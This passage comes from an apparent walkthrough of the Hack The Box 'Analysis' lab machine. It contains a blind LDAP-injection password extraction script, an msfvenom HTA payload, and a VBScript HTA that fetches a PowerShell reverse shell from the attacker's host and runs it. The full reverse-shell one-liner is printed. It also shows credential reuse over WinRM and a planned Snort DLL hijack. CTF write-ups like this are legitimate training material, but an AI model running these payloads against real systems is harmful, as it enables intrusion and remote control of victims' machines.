HEADERS <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">"Host"</span><span class="token punctuation">:</span> TARGET_HOST<span class="token punctuation">}</span> ALPHABET <span class="token operator">=</span> <span class="token punctuation">(</span> string<span class="token punctuation">.</span>ascii_letters <span class="token operator">+</span> string<span class="token punctuation">.</span>digits <span class="token operator">+</span> <span class="token string">''</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span>c <span class="token keyword">for</span> c <span class="token keyword">in</span> string<span class="token punctuation">.</span>punctuation <span class="token keyword">if</span> c <span class="token keyword">not</span> <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">"("</span><span class="token punctuation">,</span> <span class="token string">")"</span><span class="token punctuation">,</span> <span class="token string">"#"</span><span class="token punctuation">,</span> <span class="token string">"&amp;"</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token keyword">def</span> <span class="token function">is_valid_character</span><span class="token punctuation">(</span>username<span class="token punctuation">:</span> <span class="token builtin">str</span><span class="token punctuation">,</span> attribute<span class="token punctuation">:</span> <span class="token builtin">str</span><span class="token punctuation">,</span> test_value<span class="token punctuation">:</span> <span class="token builtin">str</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token builtin">bool</span><span class="token punctuation">:</span> payload <span class="token operator">=</span> <span class="token string-interpolation"><span class="token string">f"</span><span class="token interpolation"><span class="token punctuation">{</span>username<span class="token punctuation">}</span></span><span class="token string">)(</span><span class="token interpolation"><span class="token punctuation">{</span>attribute<span class="token punctuation">}</span></span><span class="token string">=</span><span class="token interpolation"><span class="token punctuation">{</span>test_value<span class="token punctuation">}</span></span><span class="token string">*"</span></span> params <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">"name"</span><span class="token punctuation">:</span> payload<span class="token punctuation">}</span> response <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>BASE_URL<span class="token punctuation">,</span> headers<span class="token operator">=</span>HEADERS<span class="token punctuation">,</span> params<span class="token operator">=</span>params<span class="token punctuation">)</span> <span class="token keyword">return</span> <span class="token string">"CONTACT_"</span> <span class="token keyword">not</span> <span class="token keyword">in</span> response<span class="token punctuation">.</span>text <span class="token keyword">def</span> <span class="token function">brute_force_attribute</span><span class="token punctuation">(</span>username<span class="token punctuation">:</span> <span class="token builtin">str</span><span class="token punctuation">,</span> attribute<span class="token punctuation">:</span> <span class="token builtin">str</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token builtin">str</span><span class="token punctuation">:</span> value <span class="token operator">=</span> <span class="token string">""</span> <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span> <span class="token keyword">for</span> char <span class="token keyword">in</span> ALPHABET<span class="token punctuation">:</span> candidate <span class="token operator">=</span> value <span class="token operator">+</span> char sys<span class="token punctuation">.</span>stdout<span class="token punctuation">.</span>write<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"\r</span><span class="token interpolation"><span class="token punctuation">{</span>attribute<span class="token punctuation">}</span></span><span class="token string">: </span><span class="token interpolation"><span class="token punctuation">{</span>candidate<span class="token punctuation">}</span></span><span class="token string">"</span></span><span class="token punctuation">)</span> sys<span class="token punctuation">.</span>stdout<span class="token punctuation">.</span>flush<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">if</span> is_valid_character<span class="token punctuation">(</span>username<span class="token punctuation">,</span> attribute<span class="token punctuation">,</span> candidate<span class="token punctuation">)</span><span class="token punctuation">:</span> value <span class="token operator">=</span> candidate <span class="token keyword">break</span> <span class="token keyword">else</span><span class="token punctuation">:</span> <span class="token keyword">break</span> <span class="token keyword">if</span> value<span class="token punctuation">.</span>endswith<span class="token punctuation">(</span><span class="token string">"**"</span><span class="token punctuation">)</span><span class="token punctuation">:</span> <span class="token keyword">break</span> <span class="token keyword">return</span> value<span class="token punctuation">.</span>rstrip<span class="token punctuation">(</span><span class="token string">"*"</span><span class="token punctuation">)</span> <span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span> <span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token number">3</span><span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"Usage: </span><span class="token interpolation"><span class="token punctuation">{</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">}</span></span><span class="token string"> &lt;username> &lt;ldap_field>"</span></span><span class="token punctuation">)</span> sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> username_input <span class="token operator">=</span> sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> field_input <span class="token operator">=</span> sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span> final_value <span class="token operator">=</span> brute_force_attribute<span class="token punctuation">(</span>username_input<span class="token punctuation">,</span> field_input<span class="token punctuation">)</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"\n[+] Final </span><span class="token interpolation"><span class="token punctuation">{</span>field_input<span class="token punctuation">}</span></span><span class="token string">: </span><span class="token interpolation"><span class="token punctuation">{</span>final_value<span class="token punctuation">}</span></span><span class="token string">"</span></span><span class="token punctuation">)</span></code></pre></div> <p>The password for <code class="language-text">technician</code> was stored in the user's <code class="language-text">description</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ python3 script.py technician description description: 97NTtl*4QP96Bv** [+] Final description: 97NTtl*4QP96Bv</code></pre></div> <p>I used the credentials to log in to the internal panel:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b0adf42e38ce7014e314742c73ab0263/21f1a/internal-panel-login-technician.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6klEQVR42o2QzUrDUBCF8xI2tmkMEuzGRTYutQjqwnc2/z+6ce8bpKCgSVsTkpt83oSCtTaQgY+5c4YzHK5ysbjkennP7d0jN8sHLOsKTT9HPdVRpzrTmSHfZ5I5E1XjZPJLN880g7luYhgm5sJCCaMEzw9xvADH9UmSZ8kLjuPhytmXu667cm9L7cl2e+wdfhARhDFRLH1xjMJAlWXJdvtNURTUVcXYUpqm4ZC2bfnKMtJ0RZ7nCCH+cczXMZiw2KzZ5BlVXR81DiY8FGS4vl7TT95WHyDqXutS7zP+4K6/l4J13fzRxvzhD+7Q6O7xcEHhAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="internal panel login as technician" title="" src="/static/b0adf42e38ce7014e314742c73ab0263/50637/internal-panel-login-technician.png" srcset="/static/b0adf42e38ce7014e314742c73ab0263/dda05/internal-panel-login-technician.png 158w, /static/b0adf42e38ce7014e314742c73ab0263/679a3/internal-panel-login-technician.png 315w, /static/b0adf42e38ce7014e314742c73ab0263/50637/internal-panel-login-technician.png 630w, /static/b0adf42e38ce7014e314742c73ab0263/fddb0/internal-panel-login-technician.png 945w, /static/b0adf42e38ce7014e314742c73ab0263/f46b1/internal-panel-login-technician.png 1260w, /static/b0adf42e38ce7014e314742c73ab0263/21f1a/internal-panel-login-technician.png 1327w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This provided access to the dashboard:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7c322b4379c037c617f613754f3ae4d1/07a7f/analysis-panel-dashboard.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.15189873417721%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACeklEQVR42m1TyW7UQBScf+fECS6IQ/gMDhxYlBNCI6RESVAESWZhRt7ddrfdqz1FdU8ikiiWnq3Xb3FVvdeLVa1wsetwW41oBg/tJmjr4MOEMM0I/FoXeBYw0rz3/30TUrzMS9RCQo0Wi/W+wD4r0SsN5yccDod7Q3p2csK+GSA6Bec8Vl30FVrRY/IB37OZYDTaVhBMwCJXHiWR2XBIDR+ew/171U+4zQTkoIluwnU7Y110GEZDP+Cun1FJQ18nRouWUPd5hY4ILQtEr4i4ICKZ/McUXZgxDgpZUfIHJsWnEJI8hlLF76KsBW5W26SBYUInR1RCYVWPyIRG2ZtU3NG09Wh6ak36eacZH1GIAYroY07UeKG0QzQ5uoQiCjtqBo3DTlhcVxbLzOHTyqFQgdTGFG+UhSCrSmpsWoOz3EDo5w1JTVKbdaPxeeNxcuXx9jzg/WXAmzOPuy5AkMHHG4OTS4cPlxbvzh1eLT1e//QohmcNDREOXIU/tcE5/3hRGFzRriuDX6VFpz16Mvix0zjdWnzbOnzdWHxZW5xuDHrGHzW0Sdg4zWEYMU8UnAOZJg7DWigpuQWBOQGHydMC7KgwBwe+cAj+OJTHDa2fkVctbtY7tNSmpvhxGFGGvO7SMJTkmYoD8MiYm877IQ1LPx3KEaFgcMdFj1qVTZ++mgtdtT1NYrntUfA87mzL1crKOsVSnn2BcksUv2/XKLhOZSOISqbEh6KrTHGtJAY74W/ZoagaVE2X2KSb8rRhIJ0R232e9jJSi2sU73b0+0hfDWjJIhbHJlV7lKLphpcRxsXe7nIWqZQYhxTPj3keD/nxlsRYzIk18SwC+geFly3iz9Y9ZQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="analysis panel dashboard" title="" src="/static/7c322b4379c037c617f613754f3ae4d1/50637/analysis-panel-dashboard.png" srcset="/static/7c322b4379c037c617f613754f3ae4d1/dda05/analysis-panel-dashboard.png 158w, /static/7c322b4379c037c617f613754f3ae4d1/679a3/analysis-panel-dashboard.png 315w, /static/7c322b4379c037c617f613754f3ae4d1/50637/analysis-panel-dashboard.png 630w, /static/7c322b4379c037c617f613754f3ae4d1/fddb0/analysis-panel-dashboard.png 945w, /static/7c322b4379c037c617f613754f3ae4d1/f46b1/analysis-panel-dashboard.png 1260w, /static/7c322b4379c037c617f613754f3ae4d1/07a7f/analysis-panel-dashboard.png 1333w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The tickets page contained submitted tickets by employees regarding various IT related issues:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/33f0cc98678efc459c32dc94387ba710/07a7f/analysis-panel-tickets.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 37.34177215189873%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABRUlEQVR42nVRW04DMQzs7eEeXAcQEkICCdSqtNvdbpLN+7nVYGfFF+LDsp1kJuPxbi883gaHLxEhfEWqK1KpqO2Gtt6oboi5/hupNlyGCbMycCFjdziesN8fIBeLQiScT5crbEgIBAi5waeCQMF5I6JPyhYhbcS1VrS2YidsxFXZ/jgToSDCmfrzOONyVXCx4jwJjPPSe2UCtEtYCKd9hqT+Khe8fmsIRwoHkzHpiExjskJtAwElJsEEAtOsKLb+92yknj9e6K0icqMk7h4LXmZSKBeDw/FMDxz5tcL6RIoNpHYdZEjFYj0p83Tmu1dcu1DIlgJlyRpr8fDe8KGIkAHaRQKmTsi/8rgjKRtoVL4XZAGT8Rn7O3QLVBcxSQMjBe6fGp4nInSRza7gzGbzVn3clrAtYO3136hdAGNyLvhUDTqt+AEHhhbQFHOj0QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="analysis panel tickets" title="" src="/static/33f0cc98678efc459c32dc94387ba710/50637/analysis-panel-tickets.png" srcset="/static/33f0cc98678efc459c32dc94387ba710/dda05/analysis-panel-tickets.png 158w, /static/33f0cc98678efc459c32dc94387ba710/679a3/analysis-panel-tickets.png 315w, /static/33f0cc98678efc459c32dc94387ba710/50637/analysis-panel-tickets.png 630w, /static/33f0cc98678efc459c32dc94387ba710/fddb0/analysis-panel-tickets.png 945w, /static/33f0cc98678efc459c32dc94387ba710/f46b1/analysis-panel-tickets.png 1260w, /static/33f0cc98678efc459c32dc94387ba710/07a7f/analysis-panel-tickets.png 1333w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The details for one of the tickets mentions an issue with HTA files:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/aa272207f757555aaaa08e6401d2ba0e/ea696/analysis-panel-ticket-detail.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2ElEQVR42qVRSXLDIBDk/2/LIR9IXI6DViSshWUAqzMaWTnFp1DV1WzTTQ/qTXu81wHVRPCU4WJCZE7lgZgyVk8HQnqJj8sNVdPDzg7q86rRj5OIrT6iM6Mw5QcCFRY9EPj8JQIJUy5QTdvjvjgELrLTiq+qxfW7hrEzuuGOqjWou0HcZxf/xMh1jbFirPqFkFg5lQ3z6kVEN53wCc2imiNVT94NTiNjJxFsWdDxS9XlVmOwi0RO5YyYpY/Ec3quJRr3N9DR4513/N7hvcx9V2ec/TO2Df8ePznIz+O7t11aAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="analysis panel ticket detail" title="" src="/static/aa272207f757555aaaa08e6401d2ba0e/50637/analysis-panel-ticket-detail.png" srcset="/static/aa272207f757555aaaa08e6401d2ba0e/dda05/analysis-panel-ticket-detail.png 158w, /static/aa272207f757555aaaa08e6401d2ba0e/679a3/analysis-panel-ticket-detail.png 315w, /static/aa272207f757555aaaa08e6401d2ba0e/50637/analysis-panel-ticket-detail.png 630w, /static/aa272207f757555aaaa08e6401d2ba0e/fddb0/analysis-panel-ticket-detail.png 945w, /static/aa272207f757555aaaa08e6401d2ba0e/f46b1/analysis-panel-ticket-detail.png 1260w, /static/aa272207f757555aaaa08e6401d2ba0e/ea696/analysis-panel-ticket-detail.png 1332w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The SOC report page allows users to upload files to be analyzed by the SOC:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1599eea89fda1a294c55e9406cd7814d/45929/analysis-panel-soc-report.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.93670886075949%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABaElEQVR42p2S626DMAyFef8H26RpLwBtx6UtlwIhJCGQBHJmUrXaVO3PIllOYvNhHyeqhcVbueKj3vBZr3i/WjBlMGgHPpHnI+bFwq4rrFsxmxWC7l9tCRZdmEBcMcRFg7we0EgDNRuYdSOID5B18/Aewe/nxb6acXeLkmOKOE5wLWt0/YBJm5CgJo1jWiA7l8gvFU7ZGdWtx2w3TFTxT9PG4rEiISdqS+DGRnCpIQm4t6X0EgD1jQUf9i1DS3lsVMEGoSD03pGFfwBbqiorrjh85egGGRL2CqXSiJMTAXu6H58gTgWUdUvflLiUTdDtF5AJjY5x9IPAYlzQbwcKAibHDFXToecyALmcKe5QkATJIUWaX8AVAfUPYC482sWjmgFOUnhSfwc6GoqjLBuGQ3sa0EN4R8OhI/ktnPdBPTXs6O/XqkFKbXdU5V6+Xtw96j3+XCH2Go8kaTCqmQSe7m+JNHwC/7G+AeAAt1GVNv/0AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="analysis panel SOC report" title="" src="/static/1599eea89fda1a294c55e9406cd7814d/50637/analysis-panel-soc-report.png" srcset="/static/1599eea89fda1a294c55e9406cd7814d/dda05/analysis-panel-soc-report.png 158w, /static/1599eea89fda1a294c55e9406cd7814d/679a3/analysis-panel-soc-report.png 315w, /static/1599eea89fda1a294c55e9406cd7814d/50637/analysis-panel-soc-report.png 630w, /static/1599eea89fda1a294c55e9406cd7814d/45929/analysis-panel-soc-report.png 870w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So based on the fact that an HTA was already mentioned in one of the tickets, I used <code class="language-text">msfvenom</code> to generate a malicious HTA to upload to the form:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.53 LPORT=443 -f hta-psh > test.hta [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of hta-psh file: 7793 bytes</code></pre></div> <p>I started a listener with <code class="language-text">nc</code> and uploaded <code class="language-text">test.hta</code>. A message was shown saying that the file was not safe and I didn't receive a shell on the listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/74ba613f60485d47fc0d3ad68ecc397a/45929/analysis-panel-upload-sample.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 47.46835443037975%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABTElEQVR42qWR226DMBBE+f//axK1SQMpBDAXg21sY8DTxeSiVmof2pVGstZwdjwbldJixyz2hcJbNeDIHUSvoGsOUzXQUmGaFszzpvVsxulHRYfjGbvDHvE5QZ6XsKOD1hYwBrCkZcG9vPdBv1XUcoGybkk9uDTohzFM0gS+Vm24Y6SCNWh7CetmaEtDwzcThnB2T2BDwKxgiNMcVdtDagdDPwllcEoyJNS/ZAVOcYo0Z+BiQNPJoPUsyIAyDv7hUCiaXiEva5o2QegxuJCDQXzJUDVdcNbdQDXvyTEPjlnDCWi/AhPhURuPkuKS5NwvHiMF30uN3f4N6ZURtEdBC+qoN9gZ7/EHXnavOJ4S6hFQr8ANGTEucS0rxFmJmhzc83HzvG3O3fR9o+4pS3pkKJSmpwiy322Z0JO1nfDXitYlKDuF/NYs1kz+A/wEWq+4tbIv+1QAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="analysis panel upload sample" title="" src="/static/74ba613f60485d47fc0d3ad68ecc397a/50637/analysis-panel-upload-sample.png" srcset="/static/74ba613f60485d47fc0d3ad68ecc397a/dda05/analysis-panel-upload-sample.png 158w, /static/74ba613f60485d47fc0d3ad68ecc397a/679a3/analysis-panel-upload-sample.png 315w, /static/74ba613f60485d47fc0d3ad68ecc397a/50637/analysis-panel-upload-sample.png 630w, /static/74ba613f60485d47fc0d3ad68ecc397a/45929/analysis-panel-upload-sample.png 870w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To attempt to bypass security restrictions, I wrote an HTA file that uses <code class="language-text">IEX</code> to execute a PowerShell script containing a reverse shell one-liner, which is fetched from a local web server:</p> <p><code class="language-text">shell.hta</code></p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">&lt;script language="VBScript"> Dim objShell Set objShell = CreateObject("WScript.Shell") objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.53:8000/reverse.ps1')", 0 self.close &lt;/script></code></pre></div> <p><code class="language-text">reverse.ps1</code></p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">$client = New-Object System.Net.Sockets.TCPClient('10.10.14.53',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</code></pre></div> <p>I started a Python web server and a listener with <code class="language-text">nc</code>. Then, I uploaded <code class="language-text">shell.hta</code> which bypassed security restrictions:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/05df02aec3e03236182c54340e9cf064/45929/analysis-panel-upload-sample-bypass.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 47.46835443037975%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABSUlEQVR42qWR606EMBhEef/nM2B0cWGFBcq9pRdaYPworqsm+kObTNK0cHo6DSphEDKDqJzwXEvEnUUnJAreopMCWs+wdsGyrD7OrdCz+zFBdDojfIyQnFMUZQVjLCZtoJ2CWx0+j23bfH4bQddzVE1HGdELjVHOx2kELqoWVd2C0X7JyHgUMGSraE/RN3ukn9s7sCVgXjIkWYG6GyEUAeknPinEaY6U1i95iTjJkBUMPZdoB+GzzzkJTNpi+zDkE51ek01DpzlwAu4WQmoklxx1O3izG6jpRzLuvTFrewKar8CUb2j0hkoDgsy3dcNMxY9CIYyekV2Zh5Z09YHWpFnwkrziIXzCKU5pjYBqBx7IgPUC16pGkldoyODWj12Wo0v7nu8vau8x9v54wd5VO3DSH45O6MrKOPx1BIJ0J+N8f3sXeyf/Ab4BVK+4sKCaN6YAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="analysis panel upload sample bypass" title="" src="/static/05df02aec3e03236182c54340e9cf064/50637/analysis-panel-upload-sample-bypass.png" srcset="/static/05df02aec3e03236182c54340e9cf064/dda05/analysis-panel-upload-sample-bypass.png 158w, /static/05df02aec3e03236182c54340e9cf064/679a3/analysis-panel-upload-sample-bypass.png 315w, /static/05df02aec3e03236182c54340e9cf064/50637/analysis-panel-upload-sample-bypass.png 630w, /static/05df02aec3e03236182c54340e9cf064/45929/analysis-panel-upload-sample-bypass.png 870w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">svc_web</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.53] from (UNKNOWN) [10.10.11.250] 51555 PS C:\inetpub\internal\dashboard> whoami analysis\svc_web</code></pre></div> <p>After enumerating the web server, I found credentials for the <code class="language-text">jdoe</code> user within a log file:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\inetpub\logs\LogFiles\W3SVC2> ls R?pertoire?: C:\inetpub\logs\LogFiles\W3SVC2 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 12/06/2025 21:19 2607209 u_ncsa1.log PS C:\inetpub\logs\LogFiles\W3SVC2> cat u_ncsa1.log &lt;...snip...> 127.0.0.1 - - [12/Jun/2025:21:16:25 +0200] "GET /dashboard/alert_panel.php?auth=1&amp;username=jdoe&amp;password=7y4Z4%5E*y9Zzj&amp;alert=c2_malware_detected HTTP/1.1" 200 8924 &lt;...snip...></code></pre></div> <p>The creds were valid over WinRM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ netexec winrm 10.10.11.250 -u 'jdoe' -p '7y4Z4^*y9Zzj' WINRM 10.10.11.250 5985 DC-ANALYSIS [*] Windows 10 / Server 2019 Build 17763 (name:DC-ANALYSIS) (domain:analysis.htb) WINRM 10.10.11.250 5985 DC-ANALYSIS [+] analysis.htb\jdoe:7y4Z4^*y9Zzj (Pwn3d!)</code></pre></div> <p><code class="language-text">evil-winrm</code> shell as <code class="language-text">jdoe</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ evil-winrm -i 10.10.11.250 -u 'jdoe' -p '7y4Z4^*y9Zzj' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\jdoe\Documents> whoami analysis\jdoe *Evil-WinRM* PS C:\Users\jdoe\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\jdoe\desktop> ls Directory: C:\Users\jdoe\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 6/12/2025 8:29 PM 34 user.txt</code></pre></div> <p>Further enumeration revealed that Snort was installed on the machine:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\> ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/12/2023 10:01 AM inetpub d----- 11/5/2022 8:14 PM PerfLogs d----- 5/8/2023 10:20 AM PHP d----- 7/9/2023 10:54 AM private d-r--- 11/18/2023 9:56 AM Program Files d----- 5/8/2023 10:11 AM Program Files (x86) d----- 7/9/2023 10:57 AM Snort d-r--- 5/26/2023 2:20 PM Users d----- 1/10/2024 3:52 PM Windows -a---- 6/12/2025 9:26 PM 294556 snortlog.txt</code></pre></div> <p><code class="language-text">snortlog.txt</code> was getting updated every two minutes, which indicated that Snort was actively running:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\> ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- &lt;...snip...> -a---- 6/12/2025 9:26 PM 294556 snortlog.txt *Evil-WinRM* PS C:\> ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- &lt;...snip...> -a---- 6/12/2025 9:28 PM 294810 snortlog.txt</code></pre></div> <p>I confirmed this with <code class="language-text">get-process</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\> get-process Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- &lt;...snip...> 162 18 62664 46644 904 0 snort &lt;...snip...></code></pre></div> <p>Snort supports <a href="http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node23.html" target="_blank">dynamic modules</a>, which are loaded as DLLs from a configured <code class="language-text">dynamicpreprocessor</code> directory at startup. This can be exploited by placing a malicious DLL—such as one containing a reverse shell payload—into that directory. When Snort starts, it will automatically load and execute the DLL with the privileges of the Snort service, enabling arbitrary code execution.</p> <p>To identify the location of this directory, I checked <code class="language-text">snort.conf</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Snort\etc> ls Directory: C:\Snort\etc Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/20/2022 4:15 PM 3757 classification.config -a---- 4/20/2022 4:15 PM 23654 file_magic.conf -a---- 4/20/2022 4:15 PM 33339 gen-msg.map -a---- 4/20/2022 4:15 PM 687 reference.config -a---- 7/8/2023 9:34 PM 23094 snort.conf -a---- 4/20/2022 4:15 PM 2335 threshold.conf -a---- 4/20/2022 4:15 PM 160606 unicode.map *Evil-WinRM* PS C:\Snort\etc> findstr dynamicpreprocessor snort.conf dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor</code></pre></div> <p>Regular users have write access to this directory:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Snort\lib> icacls snort_dynamicpreprocessor 